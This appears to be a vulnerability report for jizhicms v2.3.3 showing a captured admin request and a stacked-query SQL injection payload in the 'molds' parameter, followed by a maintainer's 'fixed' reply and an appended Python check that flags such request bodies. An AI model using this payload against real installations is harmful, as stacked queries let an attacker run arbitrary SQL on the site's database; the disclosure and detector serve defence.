This is one of my favorite CMS, but I found a system vulnerability.

name: jizhicms
version: v2.3.3
Installation package download:
Problematic packets:
```
POST /index.php/admins/Fields/get_fields.html HTTP/1.1
Host: 192.168.23.130:49158
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Origin: http://192.168.23.130:49158
Connection: close
Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html
Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs

molds=tags&tid=0&id=1
```
Background ->SEO settings ->TGA list ->edit, and then capture packages
Vulnerability verification exists
payload

```
Parameter: molds (POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: molds=tags;SELECT SLEEP(5)#&tid=0&id=3
```
Thanks! It has been fixed.
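A detection-side check for the request reported in this issue, added here as an example and not taken from the jizhicms code base or from the fix the maintainer applied. It assumes that `molds` is meant to carry a plain model/table identifier and that `tid` and `id` are unsigned integers; the function name and the sample bodies other than the two quoted in the issue are constructed.

```python
import re
from urllib.parse import parse_qsl

# Assumption: `molds` names a model/table, so only a short identifier is legitimate.
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")
UINT = re.compile(r"[0-9]{1,10}")
RULES = {"molds": IDENT, "tid": UINT, "id": UINT}


def check_get_fields_body(body: str) -> list[str]:
    """Return findings for one get_fields POST body; an empty list means it looks benign."""
    findings = []
    seen = {}
    # PHP splits form bodies on '&' only, so do the same here (never on ';').
    # parse_qsl also URL-decodes, so %3B and a literal ';' are judged alike.
    for name, value in parse_qsl(body, keep_blank_values=True, separator="&"):
        if name in seen:
            findings.append(f"duplicate parameter {name!r}")
        seen[name] = value  # like PHP, the last occurrence wins
    for name, pattern in RULES.items():
        if name not in seen:
            findings.append(f"missing parameter {name!r}")
        elif not pattern.fullmatch(seen[name]):
            findings.append(f"{name!r} is not a plain value: {seen[name]!r}")
    return findings


if __name__ == "__main__":
    samples = [
        "molds=tags&tid=0&id=1",                           # body quoted in the issue
        "molds=tags;SELECT SLEEP(5)#&tid=0&id=3",          # payload quoted in the issue
        "molds=tags%3BSELECT+SLEEP%285%29%23&tid=0&id=3",  # constructed: same payload, URL-encoded
        "molds=tags&tid=0&id=1&molds=tags",                # constructed: repeated parameter
    ]
    for body in samples:
        print(body, "->", check_get_fields_body(body) or "ok")
```

The same allowlist rule belongs in the application before the value reaches a query, because an identifier such as a table name cannot be bound as a prepared-statement parameter.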